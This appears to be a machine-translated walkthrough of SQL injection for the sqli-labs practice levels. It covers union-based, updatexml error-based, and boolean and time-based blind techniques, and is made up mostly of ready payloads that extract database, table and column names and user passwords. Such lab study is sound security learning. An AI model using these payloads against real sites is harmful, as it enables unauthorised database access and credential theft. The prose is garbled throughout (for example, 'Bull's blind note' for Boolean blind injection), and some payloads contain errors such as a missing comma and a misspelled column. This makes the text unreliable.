sql The general process of Injection ：

(1~6 Turn off )

1. Determine the injection point

   • When id=1 and 1=2 – q Page exception is Probably It exists in sql Inject
   • If the page appears illegal , Use other injections .

2. Determine the number of fields

   • order by （ Sort the results according to the specified column ）, The output number exceeds the number of columns , Report errors , Therefore, this feature can be used , Judge the number of columns .

3. Judge the echo point

   • eg: union select 1,2,3 Page shows 2, It indicates that the echo point is 2
   • Be careful ： Must let id The value of is equal to a nonexistent value , In this way, the return value of the joint query will make union The subsequent query results are in the first column of the array . Only let id Is just a nonexistent value , We will know the true data

4. Search for relevant content

   • Judge database name

     • ?id=-1 ’ union select 1,database(),3 – q( There is obvious dislocation )

     • Use updatexml An error injection （ There is no obvious dislocation ）

       grammar ：

       updatexml（ The goal is xml Content ,xml Document path , Updated content ）

       updatexml(1,concat(0x7e,( select database())0x7e),1) （0x7e, A non-conforming character appears in the function , Make it an error , Pop up the name of the library we need ）

       ?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1) – q

   • Name of judgment table

     • ?id=-1 ’ union select 1,table_name,3 from information_schema.tables where table_schema=‘security’ limit 1,1-- q

     • ?id=-1 ’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ – q

     ​ group_concat Function defect ： Will put the results together , It may make the answer incomplete

     • limit What is the library name echoed by the function action limit
     • ?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1) – q ( There is no obvious dislocation ）

   • Judge the listing

     • ?id=-1 ’ union select 1,column_name,3 from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ – q

     • ?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q**( There is no obvious dislocation ）**

       ?id=1"%20and%20updatexml(1,concat(0x7e,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27emails%27%20limit%200,1),0x7e),1)–%20q

   • Judgment data ：

     • ?id=-1 ’ union select 1,id,3 from emails – q

     • ?id=1 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

   • Extract the data ：?id=-1 ’ union select 1,group_concat(concat_ws(’~’,usename,password)) from users – q

（7~10)

• Different from the first four levels , Five to eight levels did not echo the searched information to the page （ Five or six levels of input error statements will show , But eight passes will not ）, So blind injection is needed .（ Or report a mistake , I said before ）

  • Bull's blind note
    • lenth() function Return string length
    • substr() function Intercepting string （ grammar ：substr(str,pos,len);）
    • ascii() Return character's ascii code [ Change characters into numbers well]
  • Time type
    • sleep() Hang the program for a while n by n second
    • if(expr1,expr2,expr3) Judgment statement If the first statement is correct, execute the second statement If there is an error, execute the third statement .

• Bull's blind note The problem solving steps ：（ With sql-lab less-8 For example ）

1. Get the length of the database name ： ?id=1’ and (length(database()))=8-- q( utilize > < or = To determine the length of its database )

2. Get the database name ：

   • ?id=1’ and ascii(substr(database(),1,1))=115 Indicates from the database 1 Start taking a length （ You will get a decimal number , utilize ASCII Table converts it into letters or symbols ） The first is s、

   • It can also be done through burp suite To do it

3. Get the number of tables ： ?id=1’ and (select count(*) from information_schema.tables where table_schema=‘security’)>5(=4)-- q

4. Get the length of the name of the table ： ?id=1’and (select length(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1)>5(=6)-- q Yes 6 Length

5. Get the name of the table ： ?id=1’and (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q The first is e

6. Get field name ：?id=1’and (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q The first is i

• Time blind note ：（ With sql-lab less-9 For example ） The problem solving steps

The Ninth level is found according to the blind note just now, no matter what conditions are entered , The echo result is a , It is proved that the Boolean blind note just now cannot be used , Try to use time blind

1. Parsing library name length ： ?id=1’ and if(length(database())=8,sleep(5),1)-- q（ If set up , Just react in five seconds , notes ： there 1 It doesn't mean anything ）

2. Resolve database name ：?id=1’ and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s

3. Resolve table name ： ?id=1’ and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e

4. Resolve field name ：?id=1’ and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i